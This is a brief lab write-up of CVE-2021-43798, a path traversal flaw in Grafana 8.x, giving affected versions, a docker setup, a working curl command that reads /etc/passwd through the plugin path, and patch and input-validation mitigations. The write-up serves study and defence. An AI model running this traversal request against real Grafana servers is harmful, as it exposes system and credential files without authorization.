CVE-2021-43798
1. Summary
- Grafana is an open-source platform that supports data monitoring and management. In the versions listed below, a Path Traversal vulnerability exists that allows manipulation of file paths using special characters such as
../.
- 8.0.0 and above, below 8.0.7
- 8.1.0 and above, below 8.1.8
- 8.2.0 and above, below 8.2.7
- 8.3.0
- The vulnerable path is
<grafana_host_url>/public/plugins/<plugin_id>/, where <plugin_id> is the ID of the installed plugin. The vulnerable path can be identified through the following resource:
2. Vulnerable Environment Setup and Execution
2.1 Environment Used
2.2 Execution Method
docker-compose up -d
3. Vulnerability Reproduction
- Verification of the open page
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd was used to access /etc/passwd.
4. Conclusion (Mitigation)
- If you are using a version affected by the vulnerability, update to the patched versions: 8.3.1, 8.2.7, 8.1.8, or 8.0.7.
- To prevent Path Traversal vulnerabilities, apply a whitelist approach that only allows access to permitted paths, and perform input validation and path normalization to restrict abnormal path access such as moving to parent directories (
../).
References